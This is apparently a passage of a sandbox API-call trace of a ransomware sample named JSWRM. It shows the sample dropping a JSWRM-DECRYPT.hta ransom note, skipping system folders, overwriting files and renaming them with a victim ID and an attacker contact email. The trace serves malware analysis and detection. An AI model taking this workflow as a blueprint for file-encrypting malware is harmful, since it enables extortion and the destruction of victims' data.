hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226430 | out: hHeap=0x1e0000) returned 1 [0059.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0059.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0059.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0059.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0059.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0059.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0059.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2268b0 [0059.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0059.794] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1046\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0059.796] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.796] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0059.799] CloseHandle (hObject=0x450) returned 1 [0059.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2268b0 | out: hHeap=0x1e0000) returned 1 [0059.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0059.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0059.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0059.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0059.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0059.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225ab0 [0059.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0059.799] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1046\\jswrm-decrypt.hta")) returned 0x20 [0059.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225ab0 | out: hHeap=0x1e0000) returned 1 [0059.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0059.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0059.799] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1046\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a4c588b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x231e80 [0059.800] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.800] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a4c588b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0059.800] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.800] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.800] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe63, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0059.800] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0059.800] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0059.800] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 1 [0059.800] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0059.800] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0059.800] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0059.800] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0059.800] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0059.800] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0059.800] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0059.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0059.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0059.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0059.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0059.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0059.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0059.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0059.800] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.801] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=3683) returned 1 [0059.801] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe60) returned 0x23dc88 [0059.801] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0xe60, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0xe60, lpOverlapped=0x0) returned 1 [0059.802] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.802] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0xe60, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0xe60, lpOverlapped=0x0) returned 1 [0059.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0059.803] CloseHandle (hObject=0x3d4) returned 1 [0059.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0059.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0059.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0059.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0059.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0059.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0059.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0059.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0059.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.804] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0059.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0059.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0059.804] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4c588b, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1a4c588b, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1a4eb822, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0059.804] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0059.804] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0059.804] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0059.804] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0059.805] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0059.805] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0059.805] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0059.805] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0059.805] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0059.805] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0059.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0059.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0059.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0059.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0059.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0059.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0059.805] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13b62, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0059.805] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0059.805] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0059.805] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0059.805] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0059.805] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0059.805] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0059.805] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0059.805] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0059.805] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0059.805] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0059.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0059.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0059.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0059.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0059.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0059.806] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.806] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=80738) returned 1 [0059.806] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x13b60) returned 0x2471a8 [0059.806] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x13b60, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x13b60, lpOverlapped=0x0) returned 1 [0059.823] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.823] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x13b60, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x13b60, lpOverlapped=0x0) returned 1 [0059.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.824] CloseHandle (hObject=0x3d4) returned 1 [0059.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0059.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0059.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0059.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0059.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2175c0 [0059.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0059.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0059.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2175c0 | out: hHeap=0x1e0000) returned 1 [0059.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.827] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0059.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0059.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0059.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0059.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0059.828] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0059.828] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0059.828] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0059.828] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 